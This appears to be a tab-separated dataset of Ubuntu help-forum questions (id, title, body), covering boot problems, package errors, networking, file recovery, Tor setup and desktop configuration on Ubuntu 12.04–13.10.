320720	dual boot lost this morning	i shut down computer after completing a session . when i booted for the next session , the startup menu no longer provided the option to boot with windows . filemanager/nautilus still shows existence of windows partition and all of its files , but i do n't have boot option ( gparted still says that partition is flagged as bootable ) how do i get the lost boot option back ?
320723	how to secure my browsing while using wifi	i use wifi with a vpn and sometimes tails and tor . i have no control over router settings but wifi is secure wpa/wpa2 . the router is used by others in my apartment building also . can the sites i visit be observed by someone with router or isp access when i am using a vpn or tor . i 'm not concerned with the vpn administrators knowing my browsing , only if others in my apartment complex can spy on me when i 'm using a vpn or tor .
320727	ubuntu software center does not open - dbus error	ubuntu software center does not open , i tried these instructions to fix it but they did n't work https : //help.ubuntu.com/community/packagemanagertroubleshootingprocedure when i run software-center command from a bash terminal , it still give me the next error . ~ $ software-center 2013-07-16 13:28:18,591 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-07-16 13:28:18,654 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-07-16 13:28:18,653 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : i found that this error was produced after install google-api-python-client using this command : sudo easy_install -- upgrade google-api-python-client it seems that it messed up with some httplib . i still do n't know how to correct this error ( or install this package correctly ) . i had to reinstall ubuntu and do not install the api to avoid the problem . i would be grateful if someone could help me .
320729	ubuntu minimial install mounts internal hd as sdb	i am trying to setup 13.04 on a new internal ssd on an intel nuc i3 from a usb stick . for some reason during the install it mounts the ssd as ssb and install on it but writes to the the usb stick mbr ( mounted as sda ) . so if i try to boot without the sd after the install completes it can not find the os since it is looking on sda . i looked in the bios to see if anything is in there but nothing jumped out at me . this has not happened on other pcs . i tried doing complete wipes of both the ssd and usb drive mbrs which made no difference . any ideas ? thanks ernie
320731	ubuntu 13.04 users switching without password	my wife and i share the same pc , we only use two different users for easier switching between each other 's task without interrupting anything . we 're not concerned about privacy nor security . whatever solution you think you know , i 've already tried , nothing that could work on ubuntu versions up to 12.10 , does n't work anymore on 13.04 , that 's why i 'm asking something that seems to be answered so many times in the past . i 've already disabled the `` lock screen '' for both users , and this is not enough . please tell me what could be a good solution for this . thanks !
320733	will a ruby installation installed by a package manager conflict with one installed with rvm ?	i installed the heroku toolbelt the other day , and it looks like ruby was a requirement , so the package manager installed it for me . but i was planning to install ruby through rvm . will the two rubys conflict ?
320735	setting up wired broadband with static ip	i was using my wired broadband connection perfectly with windows . that broadband uses static ip . at windows 7 the setup was done in ipv4 section . that had following things : i ) ip address ii ) subnetmask iii ) default gateway -- -- -- -- -| iv ) preferred dns server -- | - i do n't know why this two were same address v ) alternate dns server now without any of this , the network will not work , they will show the presence of the network but mozilla will say , `` server not found '' now , after i switched and decided to be on ubuntu , i needed to setup static ip , i did everything this tutorial said , but it returned with `` server not found '' please help me .
320739	can not boot from usb hp laptop	i am having trouble trying to install ubuntu om my hp laptop . i reset the boot order in bios nothing it says usb stick 1st priority . i noticed my device ( usb ) does not show up in the list of options . is there a way to get the bios to read the usb ? is there a way around this ? disk install ? i love ubuntu and want it now ... lol thanks in advance for your help ... ..also tried live but it hangs and i get nothing after about 10 minutes ... .
320741	my gparted does not work propperly	[ please be nice to me - i 'm not an expert in linux ] you can see the errorlog provided by gparted here : http : //www.mediafire.com/download/8o43b37c7fue1f9/gparted_details.htm hi askubuntu . i am trying to resize my asus zenbook ux31e 's partition , but it does not work using gparted on a liveusb . here is what i do : download ubtuntu 13.04 , and burn it to a usb , using the software that comes with ubuntu reboot into the live envirorment unmount all the partitions open gparted resizes /dev/sda2 using `` right click - > move/resize '' . i have non-allocated space 98.01 gb , that i will give to my /dev/sda2/ click the green checkmark ( apply all operations ) click ok to the warning and a error ( with no futer information than that ) comes up . click `` save details '' ( http : //www.mediafire.com/download/8o43b37c7fue1f9/gparted_details.htm ) ask you what 's wrong
320742	awkward gpg error with ubuntu server running `` sudo apt-get update ''	i just installed raring 32 bit server on an old machine , it seemed to work fine , but when i try to run sudo apt-get update i get this error ( i 'm translating from italian ) e : gpg error : http : //security.ubuntu.com raring-security release : the following signatures were not valid : nodata 1 nodata 2 this is just awkward , i never experienced something like this , what should i do ? ps : i ca n't install any package because they are not recognized ( i.e . if i try to install openjdk-6-jdk it tells me that the package can not be found )
320746	how to mount ftp resources with fstab when connection is available ?	i 'd like to automount an ftp folder using curlftpfs putting in fstab a row like : curlftpfs # user : pwd @ myhost : port/folder/ /mnt/mymountfolder fuse allow_other , uid=1000 , gid=1000 , umask=0022 , _netdev 0 0 normally it would n't work , as during the boot the network ( wifi usually ) is not available for my laptop . i read that _netdev option in fstab should ensure the mounting only when the network is available , but i receive the message : error connecting to ftp : could n't resolve host myhost alternatively i could mount the resource with an autorun script after the login has been made , but i 'd like much more the fstab solution . the final goal is to syncronize a local folder with the ftp folder with a crontab rsync , so if you have other suggestions , i will be grateful !
320749	not able to run sudo apt-get update in 12.10	i am trying to run sudo apt-get update but getting below mentioned error .. do you think there is any issue with ubuntu 's installation ? e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? your help is highly appreciated ... thanks
320750	skype not working . ubuntu 13.04	i 've been using skype for linux for a while now . when i tried to use it today , it would freeze and force quit every time i did anything . i am also getting the error message that skype is not installed , yet it still appears in my launcher , although it does not appear in the list of installed packages . how can i fix this ?
320754	amd unsupported hardware now a blank but not black screen not broken pipes 13.04	i can not see any programs but the screen has the normal background - unable to do anything if i want to get out control alt delete and then i can exit - read most of the articles but i am unable to change anything . this all happened after i followed a command line that said it would get rid of the amd unsupported hardware - is there a way of just breaking in ?
320756	weird directories are automatically created	i have one directory that is being created automatically in my home folder . i remove it and it comes back . now suddenly another directory have been created and i ca n't figure out why ! ? victor @ guinness : ~ $ ls -l total 64k drwxrwxr-x 2 victor victor 4,0k jul 15 13:55 ? ? _ $ ? drwxrwxr-x 2 victor victor 4,0k jul 10 19:00 'a ? drwxrwxr-x 3 victor victor 4,0k jun 19 21:09 apps drwxrwxr-x 2 victor victor 4,0k jun 12 20:59 cbt drwxr-xr-x 2 victor victor 4,0k jul 3 18:54 desktop drwxr-xr-x 2 victor victor 4,0k jul 3 19:09 documents drwxr-xr-x 3 victor victor 4,0k jul 16 18:35 downloads drwxrwxr-x 3 victor victor 4,0k jul 3 18:54 image-line drwxr-xr-x 3 victor victor 4,0k jun 28 17:45 music drwxr-xr-x 3 victor victor 4,0k jul 16 19:23 pictures drwxr-xr-x 2 victor victor 4,0k jun 11 20:43 public drwxrwxr-x 2 victor victor 4,0k jul 15 13:55 sv_se.utf-8 drwxr-xr-x 2 victor victor 4,0k jun 11 20:43 templates drwxrwxr-x 2 victor victor 4,0k jun 12 21:10 ubuntu one drwxr-xr-x 2 victor victor 4,0k jun 11 20:43 videos drwxrwxr-x 4 victor victor 4,0k jul 3 18:14 virtualbox vms when trying to remove them in the terminal : victor @ guinness : ~ $ rm `` 'a^a^ ? `` / rm : can not remove ‘'a\001\177/’ : no such file or directory victor @ guinness : ~ $ rm `` ? ? _ $ ? '' rm : can not remove ‘ ? ? _1’ : no such file or directory doing rm and a < tab > : victor @ guinness : ~ $ rm ^w^l_ $ ^ ? / .gnome/ public/ 'a^ ? / .gnome2/ .remmina/ [ ... ] so it 's some weird characters . also , the directory `` sv_se.utf-8 '' was created the same time as `` ? ? _ $ ? '' . maybe it 's a connection ? this weird problem started after an fresh install of ubuntu 13.04 . what can i do to find what 's creating these folders ? thanks in advance edit : i 've found that it is transmission that is creating them !
320758	ubuntu software center not on 13.10	i 'm using ubuntu 13.10 , and have an issue with the ubuntu software center , namely , it refuses to open . i have tried updating it and reinstalling it via terminal , however it still wo n't work . also , when i try to install via download , it does not come up as a program to use to open the file , even when downloaded from a ubuntu like for software center .
320761	access windows directories with dual boot	i 'm using both windows 7 and ubuntu 12.10 on the same computer . normally on ubuntu i can access anything on drive q , so i usually use that drive as a share platform between the two os because i switch between the two very frequently . is there a way that i could access all of the others drives of windows on ubuntu ? if it 's possible to do it in both ways it 'd be even better ! thanks here 's a screenshot of the current devices listed on nautilus .
320781	how to install xfce twice , side by side ?	i would love to be able to have 2 xfce installations on ubuntu , side by side as if they were separate desktop environments ( eg kde & xfce ) . anyone know how i can do this ? i understand it 's an odd request . i 'm running ubuntu 13.04 - server x86-64 in a vmware player 5 virtual machine .
320786	should i backup my data partition before installing ubuntu ?	i have my hdd with two partitions ( c : \ with w7 on it and d : \ with all my data ) . i really want to leave w7 behind and get my laptop only running ubuntu : ) . when i run the installation cd , 多will it delete my d : \ partition as well ? or can i install ubuntu just fine without backing up my d : \ partition ? i appreciate a lot your help .
320787	i ca n't log into ubuntu server 12.04.2 because it wo n't let me enter my password on my virtual machine , how can i fix this ?	it will start to boot up , then it will ask me to enter a user name that i wish to log into , after that it will not let me type my password in .
320791	how to add new fonts to gimp ?	with this question i refer to the one , where to add fonts to libreoffice : why i ca n't install new fonts in libreoffice ? how can i add new fonts to gimp ?
320800	how to install canon pixma mp620 ?	i have been trying to install my canon pixma mp620 printer via cable network on my ubuntu 13.04 64bit os for two days . previously i also tried to install the printer on linux mint 15 , but failed . there are lots ( really tons ) of well written tutorials how to install the printer ( e.g . this wiki on ubuntuusers.de ) . however nothing seems to work on 13.04 . after messing up my system with lots of packages and different drivers i did a complete reinstall of the operating system . i 'm really tired now . so before trying again to install the driver : has anyone had success to get the mp620 or mp630 running on 13.04 / 14.04 ? if you do not know how to get the mp620 running , no problem , i just want to know if it is possible . nevertheless a link to working tutorial , wiki or little how-to would be really awesome !
320810	what is the recommended way to chainload separate ubuntu /boot partition	i want to have dual-boot two different ubuntu distributions on the same hard drive . i 've installed the first , with external /boot partition ( e.g . /dev/sda2 ) . then i 've installed the second distribution , with separate /boot partition ( e.g . /dev/sda5 ) . i thought , that after installation of the second ubuntu , the update-grub would automatically add entries for the first ubuntu by chainloading /dev/sda2 from /dev/sda5 . it did not happen . now , i wonder , what is the recommended way of chainloading the /dev/sda2 from /dev/sda5 . i believe the recommended method would involve using the existing scripts on /etc/grub.d because the /boot/grub/grub.cfg will get replaced if i change it manually .
320811	what are the core fundamental pieces of linux wireless networking ?	i want to learn how to setup wireless networking on my linux machines ( a mix of distros , but mostly ubuntu ) . i currently have networking functional on all of them , but the approach i took to do this was to search for guides online and then copy various snippets of text into various files on the machine and then do this until it finally worked . i did n't really understand what i was doing and i want to learn how to do this configuration myself . my impression of the topic is that there are two pieces involved : the `` core '' pieces of the wireless network and then multiple , different `` configurators '' that are available to be used in configuring those core pieces ( is wpa-supplicant one of these configurators or have i misunderstood ? ) . what i 'm interested in , to begin with , is the core fundamentals of wireless networking on linux . can someone either explain how these core pieces work and how to configure them ( manually ) , or perhaps if the explanation is too long , provide a list of sub-topics to guide further research ?
320815	how to change color depth to 32 bit ?	i have ubuntu 13.04 amd 64 and i want to change color depth to 32 bit and i tried to change /etc/x11/xorg.conf but i think it did n't work please for help . hint : my graphic card is intel g41
320818	do keyboard shortcuts used in windows work in ubuntu ?	as i mentioned in another question , i am thinking of buying a new laptop with ubuntu pre-installed . i share a laptop with my partner who knows much less about computers than me . since the lessons i have given my partner on shortcuts like ctrl-c & ctrl-v to copy & paste have really 'stuck ' , i would like to know if these will still work . i am still trying to decide if switching is right thing to do - we are going to try ubuntu on current laptop first , i think .
320820	how to use mythlink.pl	i have been trying to understand how to use mythlink.pl . i would like the mythtv recordings to have a readable title . i have read several articles and posts on different forums , but i still do not understand how to execute the script . is there any dependencies that i need to install ? it is very unclear to me . any assistance will be appreciated . sister5091
320826	is it possible to make an exact iso of my system to put on other computers ?	i am new to linux , but had a question . i am getting in the business of buying old computers , putting linux on them , then donating them to students who do n't have their own computer at home . i have gone through and installed xubuntu on my system , installed/uninstalled all the software that i want/need , and now want to know if there is a way that i could make an iso of my system , and put it onto another computer , and still have all of my tweaks , and programs ready to go after the iso has installed . that way i do n't need to go through and spend an hour or two on every computer . what programs would you recommend for creating an iso like this ? thanks , tobin
320827	computer is in password lock mode/ in black bios screen ? 12.04 64 bit	my new download from 10.04 to 12.04 upgrade has been a disaster for me so far . i can not understand why my desktop screen password/authenticate whichever will not reconize my password , but after every 3rd time it opens up anyway . i went ot this site and found some options so i went to try my 1st option and now im stuck completly . i just pressed ctl+ alt+ t and then it went to lock mode , an all black screen . that repetetly asks for my password , but does not allow keyboard input . it lets me try 2 times then says it is shutting down .
320828	how to have launcher on non-primary screen ?	i 'm running ubuntu 12.04 lts on one computer with two monitors . i 've found the place in settings where i can set the `` launcher placement '' and the `` primary '' monitor ( using the black bar ) ; however , i ca n't figure out how to put the launcher on the non-primary monitor . i want the launcher on the left monitor and my right monitor to be primary . my reasoning for this is that i want to run a full screen app on the right , primary monitor , while having the launcher available on the left . if i try to set launcher placement to left and primary monitor on right , when i press apply the launcher placement automatically changes to right . is there a way to fix this ? i 'm willing to use command line tools if needed .
320831	how to find system > administration > os-uninstaller menu in gnome ?	i 'd like to uninstall windows 7 , i read that through gnome i can open an os uninstaller , but i ca n't find the way ... anyone ?
320835	the command for freeing memory in ubuntu does n't work	the situation is this : i run a matlab program that uses a huge amounts of memory and swap memory , however , while it 's running , i killed it ( ctrl+z ) , but i find that it did not return the memory it takes . when i want to run the program again , matlab tells me 'out of memory ' . so i need the free the wasteful memory myself , i tried sudo sysctl -w vm.drop_caches=3 but it does n't work , the memory is still in use . this is what my top shows top - 19:39:52 up 1:25 , 3 users , load average : 0.27 , 0.51 , 0.73 tasks : 227 total , 1 running , 223 sleeping , 2 stopped , 1 zombie cpu ( s ) : 4.2 % us , 0.9 % sy , 0.0 % ni , 94.8 % id , 0.1 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 8045612k total , 6878404k used , 1167208k free , 25096k buffers swap : 15622140k total , 7239720k used , 8382420k free , 406024k cached pid user pr ni virt res shr s % cpu % mem time+ command 2542 txh18 20 0 457m 18m 10m s 10 0.2 6:24.66 gnome-system-mo 1403 root 20 0 201m 14m 4356 s 6 0.2 3:33.67 xorg 2218 txh18 20 0 1272m 39m 10m s 2 0.5 1:51.68 compiz 8176 txh18 20 0 884m 62m 22m s 2 0.8 0:08.86 chromium-browse 7858 txh18 20 0 2858m 143m 53m s 1 1.8 0:25.54 chromium-browse 2547 txh18 20 0 503m 9.9m 4796 s 1 0.1 0:04.91 gnome-terminal 8298 txh18 20 0 483m 49m 24m s 1 0.6 0:03.39 chromium-browse 15 root rt 0 0 0 0 s 0 0.0 0:00.01 watchdog/2 2188 txh18 20 0 19556 2608 612 s 0 0.0 0:06.88 dbus-daemon 2289 txh18 20 0 316m 9176 6168 s 0 0.1 0:01.26 gtk-window-deco 2299 txh18 20 0 511m 15m 5544 s 0 0.2 0:16.61 unity-panel-ser hope someone can help me free my memory , thanks . i 'm sorry , the top list is not complete , when i shift+m in the top , i found that the matlab process is still there .
320840	stopped ssh , need way to connect again	i rented a virtual machine with ubuntu server . i logged in via the ssh-command in the terminal from my ubuntu home pc . before i exited , i accidentally typed `` stop ssh '' in the terminal , because i thought it would end my ssh-session with the server . at the end `` exit '' did it - now i cant connect anymore to the server using `` ssh user @ host '' with the error message : ssh : connect to host hostname port 22 : connection refused i think i shut down the ssh-module in the server . as an alternative connection way , i already tried the `` sftp user @ host '' command , but in the end this command also tries to ssh to the server . as i rented this virtual machine , i do n't have direct access to the servers file structure to change a configuration file or something like that . is there any other way except ssh to connect to the server ? thanks in advance
320845	which file system supports raid and is mature enough for a media server ?	i am planning on setting up a home media machine with ubuntu 12.04 lts or 13.04 ( please let me know if this makes a difference ) . i have 4 hard drives and i am looking for a file system that supports raid and will be resistant to one or two hard drive failures . i would prefer to have a file system with the least amount of problems that would lead to lost data or system crashing . i have some experience with zfs on freebsd , but i am not sure if zfs on linux is mature enough . does anyone have any experience or knows a website where i can read up on how the different filesystems compare currently ?
320847	is it possible than my user disappears from sudo ?	that happened after i managed to install virtual box . i found a part of the answer here : http : //ubuntuforums.org/showthread.php ? t=1376802 . i added my user to another group and then lost my user to sudoers group . the joke is i have n't any root or admin account - my current user was the sole user of my ubuntu desktop .
320849	grub rescue after ububtu removing	i 've red plenty articles but i got no answer . i had improperly installed ubuntu 13.04 so i wanted to remove ubuntu from my hard drive . so through live cd - > gparted i removed everything linux partition and swap then formated both to ntfs . now i have this error . on the hdd was only the linux . nothing else . ls output in grub rescue is ( hd0 , msdos1 ) . set output is prefix= ( hd0 , msdos1 ) /boor/grub root=hd0 , msdos1 hopefully it will help and you would be able to help me . cheers lama .
320851	help ! i deleted a folder in ubuntu , recovery please ?	the folder is massive and made of many many different files.390 gb the file system is ext4 i was about to copy this file to another hard drive using gksudo nautilus so i didnt have do a massive chmod operation on the destination hard drive . but then i accidentally hit move to trash . which in gksudo nautilus means permanent deletion . i checked the trash but its not even an operation ... i have seen tools like testdisk and other recovery tools but none that can recover and whole folder because its made up of different files . i dont think that this would work but if i deleted the partition could i just recover the whole partition at once ? or would this be wrong because i have already deleted the partitions content ? i am on the fence and i am very new . this is my first job in linux it any help would be appreciated . please note that i dont have a backup ... i was trying to make one because the old backup drive died : (
320854	installing updates	we just installed the abuntu disc 9.04 and are wanting to update . is there a place you can buy discs to do this or should it be done online . we are new to this and a little bit confused about what to do . also , are all updates neccesary or can one choose what they want ? not sure where to go from 9.04 thank you .
320867	ubuntu-gnome ( no unity ) ca n't add launchers	i 've tried by code and by the main menu application , like every tutorial on the web i play world of warcraft and i do n't want to type de 'optirun wine `` wow folder '' ' each time so i try adding a launcher . the launcher creator starts , but as i click done , nothing change i 'm using gnome-ubuntu 13.04 i tried getting `` my launcher '' extension for gnome , but after i click install it goes back to off my nvidia drivers are not installed yet ( bumblebee ) since i have seen others having problems because of them
320869	problems after adding linux deepin repository	i added linux deepin repository to ubuntu but i do n't install anything . i used this commands : sudo apt-get update sudo apt-get upgrade and everything on ubuntu went wrong . i guess part of ubuntu updated from linux deepin repository and now i do n't know how to make a roll back on the changes .
320870	is it possible to install ubuntu on a microsoft surface ( rt ) ?	i want to know if it 's possible to install ubuntu on a microsoft surface tablet ( with windows rt ) . please help me . i want to know because you ca n't install any desktop apps on it .
320875	how do i start tor browser ? it `` exited unexpectedly ''	first off , i 'm new to linux but i 'm learning fast . i 've been trying to install tor and privoxy just to see how things work and stuff i tried with the terminal at first but it keeps failing , i tried using synaptic but it did n't work either . sometimes i get close and even get to see a shortcut on dash home and open it but tor & does n't work and when i click the shortcut i get this vidalia detected that the tor software exited unexpectedly . please check the message log for recent warning or error messages . error log jul 16 20:47:12.935 [ warning ] /home/analytic4l/.tor-browser/data/tor is not owned by this user ( analytic4l , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? jul 16 20:47:12.935 [ warning ] failed to parse/validate config : could n't access/create private data directory `` /home/analytic4l/.tor-browser/data/tor '' jul 16 20:47:12.935 [ error ] reading config failed -- see warnings above . chmod wont work analytic4l @ analytic4l-er190aa-aba-s7420n : ~ $ sudo chmod -r analytic4l : /home/analytic4l/.tor-browser chmod : invalid mode : `analytic4l : ' try `chmod -- help ' for more information .
320876	installation with live cd	i have a 12.04 live dvd . i want to dual-boot ubuntu with windows xp until i move the files on windows to an external drive . however , when i get to the install section it gives me several options for partitioning/installing . the toolbar above the selection box indicates a section of the drive in green with sufficient space to install ubuntu . should i use that part of the disk in order to have space to store ubuntu files ?
320882	files which tell that someone has accessed your computer	i know /var/log/auth.log shows who has been using sudo commands and /home/myusername/.bash_history shows command line commands . i would like to know if there are any more files similar to these 2 files in ubuntu that can be used to show that someone else may have accessed to your computer ?
320889	ubuntu ( server ) : no network interface	i got a vps from weloveservers.net yesterday , and it can not ping any ip address , and i can not use the apt-get and wget commands . after trying to figure out the problem for a while , i found that the network interfaces eth0 and eth1 are not configured . to make matters worse , bash can not find the 'auto ' command . i looked online and found that you mey need to edit /etc/network/interfaces or something , but there is an error saying that `` permission is denied '' when i try entering '/etc/network/interfaces ' into the remote console . i have full root access . it seems that the vps provider installed something other than default ubuntu 12.04 64-bit . for all i know , i may have ubuntu server installed , or some crazy , unheard-of os . so is there a way to configure the eth0/eth1 network interface properly ? if you 're wondering how i can access the remote console , i think that the control panel program directly communicates with the server .
320890	boot problem ubuntu and windows7	i install ubuntu12.10 than i install windows 7 and now i have access only at windows : ( i did n't find any solution for this ... can you help me please ? thanks
320891	why does flash freeze ubuntu & firefox ?	pages like this that have many embedded videos , freeze ubuntu for a long time , then flash crashes . is this just a ubuntu 64-bit problem ? do i need more than my current 2gb ram ? http : //www.deanstalk.net/deanstalk/video/ i 'm surprised that it can completely freeze up firefox , since firefox uses a separate process for plugins ? should this be reported as a bug , in firefox , or ubuntu ?
320892	ubuntu 12.04 backlight problem , function keys not working	i have ubuntu 12.04.2 lts and i recently updated my system . there was a kernel update also . i tried several solutions on net . like this , this and none of them worked for me . i put that acpi_backlight= vendor and i was not able to change brightness at all . i removed that from grub file and i was able to change brightness from brightness and lock , function keys are still not working for brightness while volume function and other function keys are working properly .
320898	can i get a backup of ubuntu ?	i 'm getting a new computer soon and i want to know how to get a backup of my ubuntu system , and transfer it over to my new computer ? how do i do that ?
320903	usb drive with stripped down ubuntu	is there a proper way to set up a flash drive with a stripped down version of ubuntu ( any version ) leaving the user with an os and a browser only ?
320908	how to redirect output to a log file without tee ? normal redirection is not working	why not use tee ? because the terminal rendering of the output makes the application run slower . for some reason , this is not working : application 2 > & 1 > '' $ logfile '' the output keeps going to terminal..
320916	music player is not working	i am trying to play songs , but it is asking for pluggins . can anyone help me to overcome with this problem .
320919	change the terminal prompt	this can be really trivial , but it helps in ways of making it more comfortable while coding and sending commands to terminal . my terminal source/bash/root name ( my apologies , i dunno which is the right word ) , reads as follows : itachi @ itachi-hp-pavilion-g6-notebook-pc : ~ $ can you please tell me how can i shorten this or change it ? the second part after ' @ ' is too long . is there anyway to change this. ? thanks in advance..
320920	give www-data permissions of root ?	i want to access the root crontab from web interface.i have apache and php installed.i have a project in which i have to change the job timings in crontab . how can i change the timing of crontab jobs from web interface ? and how to configure permissions ? if it is simple to do that from php function plz help ? thanks
320921	having dns issues when connected to a vpn in ubuntu 13.04	i am connecting to a cisco vpn server using vpnc . once connected , my machine was unable to automatically update dns setting from the new vpn . i tested by temporarily changing /etc/resolv.conf with the proper nameserver and search domain , and everything worked . this is obviously not a long term solution , so i added an additional dns server and search domain to the vpn settings in network manager . with those settings in place , resolvconf does add the search domain , but not the dns ip , and i still can not do any lookups . what is my next step in configuring or troubleshooting from here ?
320925	share internet connection from computer without nat	is there a way to use my laptop with a wifi card and provide network access to my laptop without nat ? i currently set up network manager to share the internet connection and i can browse the internet and ping machines in the 192.168.1.xxx network just fine , but none of those computers can reach my desktop behind my laptop . my desktop 's ip is 10.42.0.92 while my laptop 's ip over ethernet is 10.42.0.1 . any help would be greatly appreciated .
320926	can not revert back to ubuntu 13.04	i am new in linux world . i had ubuntu 13.04 installed . some days ago i have installed `` kde '' in ubuntu 13.04 and after restart it became `` kubuntu '' . i did not like it and tried to revert back to ubuntu 13.04 , but ca n't do it . i have tried solution from the following links how to remove all traces of kde installed http : //www.psychocats.net/ubuntu/purexubuntu none of those solution work for me , i get these errors : http : //pastebin.com/h6zdsl76 i have also tried these following commands sudo apt-get remove kubuntu-desktop sudo apt-get autoremove at last i have used following command sudo apt-get remove akonadi-facebook akregator amarok amarok-common amarok-utils apport-kde apturl-kde ark audiocd-kio bluedevil calligra-data calligra-libs cdparanoia cdrdao colord-kde cryptsetup dolphin dragonplayer freespacenotifier gnupg-agent gnupg2 gpgsm gstreamer0.10-qapt gtk2-engines-oxygen gtk3-engines-oxygen gwenview ibus-qt4 k3b k3b-data kaccessible kaddressbook kamera kamoso kate kcalc kde-base-artwork kde-baseapps-bin kde-baseapps-data kde-config-gtk-style kde-config-tablet kde-config-telepathy-accounts kde-config-touchpad kde-style-oxygen kde-telepathy kde-telepathy-approver kde-telepathy-auth-handler kde-telepathy-contact-list kde-telepathy-data kde-telepathy-desktop-applets kde-telepathy-filetransfer-handler kde-telepathy-integration-module kde-telepathy-minimal kde-telepathy-send-file kde-telepathy-text-ui kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdegames-card-data kdegames-data kdegraphics-strigi-analyzer kdemultimedia-kio-plugins kdenetwork-filesharing kdepasswd kdepim-kresources kdepim-strigi-plugins kdesudo kexi khelpcenter4 kinfocenter kio-mtp klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact korganizer kpat kppp krdc krita krita-data kscreen ksnapshot ksysguard ksysguardd ksystemlog ktorrent ktorrent-data ktouchpadenabler kubuntu-desktop kubuntu-firefox-installer kubuntu-notification-helper kubuntu-settings-desktop kubuntu-settings-netbook kubuntu-web-shortcuts kwalletmanager libakonadi-socialutils4 libassuan0 libaudiocdplugins4 libbluedevil1 libcalendarsupport4 libchm1 libcln6 libdebconf-kde0 libdvdnav4 libdvdread4 libepub0 libeventviews4 libfftw3-double3 libflac++6 libgpgme++2 libgps20 libgrantlee-core0 libgrantlee-gui0 libgtlcore0.8 libgtlfragment0.8 libhomerun0 libibus-qt1 libincidenceeditorsng4 libindicate-qt1 libindicate5 libiso9660-8 libk3b6 libkateinterfaces4 libkblog4 libkcddb4 libkcompactdisc4 libkdcraw-data libkdcraw22 libkdecorations4abi1 libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2 libkephal4abi1 libkexiv2-11 libkexiv2-data libkfbapi1 libkipi-data libkipi10 libkleo4 libkmanagesieve4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkpgp4 libkrossui4 libksane-data libksane0 libksba8 libkscreen0 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktnef4 libktorrent-l10n libktorrent5 libktpchat0 libktpcommoninternalsprivate5 libkunitconversion4 libkwineffects1abi4 libkwinglutils1abi1 libkwinnvidiahack4 libkworkspace4abi2 liblastfm1 liblightdm-qt-2-0 libllvm3.0 libloudmouth1-0 libmailcommon4 libmailimporter4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmpcdec6 libmuonprivate1 libmusicbrainz5-0 libmygpo-qt1 libnepomukwidgets4 libokularcore2abi1 libopenal-data libopenal1 libopenconnect2 libopenjpeg2 libopenshiva0.8 libpimcommon4 libplasma-geolocation-interface4 libplasmaclock4abi3 libplasmagenericshell4 libprocesscore4abi1 libprocessui4a libqaccessibilityclient0 libqalculate5 libqalculate5-data libqca2-plugin-ossl libqgpgme1 libqimageblitz4 libqoauth1 libqtglib-2.0-0 libqtgstreamer-0.10-0 libqtgstreamerui-0.10-0 libqtscript4-core libqtscript4-gui libqtscript4-network libqtscript4-sql libqtscript4-uitools libqtscript4-xml libqtshiva0.1 libreoffice-kde libreoffice-style-oxygen libruby1.9.1 libsolidcontrol4abi2 libsolidcontrolifaces4abi2 libspnav0 libsyndication4 libtag-extras1 libtaskmanager4abi3 libtelepathy-logger-qt4-1 libtelepathy-qt4-2 libtemplateparser4 libvcdinfo0 libweather-ion6 libxcb-damage0 libyaml-0-2 libzip2 lightdm-kde-greeter muon muon-installer muon-notifier muon-updater okular okular-extra-backends oxygen-cursor-theme partitionmanager pinentry-gtk2 pinentry-qt4 plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-python plasma-widget-facebook plasma-widget-folderview plasma-widget-homerun plasma-widget-kimpanel plasma-widget-menubar plasma-widget-networkmanagement plasma-widgets-addons plasma-widgets-workspace plymouth-theme-kubuntu-logo plymouth-theme-kubuntu-text print-manager python-pyudev python3-dbus.mainloop.qt python3-pykde4 python3-pyqt4 python3-sip qapt-deb-installer quassel quassel-data rdesktop rekonq ruby ruby1.9.1 scdaemon skanlite software-properties-kde systemsettings tasks-icons ttf-oxygen-font-family ubuntu-release-upgrader-qt usb-creator-kde userconfig vcdimager & & sudo apt-get install ubuntu-desktop this command have removed lots of programs along with programs of kde , i could see that in the terminal , but i am frustrated that command also could not remove kubuntu , still graphics of kubuntu exists in every where ( during login , name , desktop everywhere ) . what can be the solution ? do i have to reinstall ubuntu 13.04 ? i do n't wan na do that cause i have installed lots of programs and set up many settings ... anyone help pease ... .
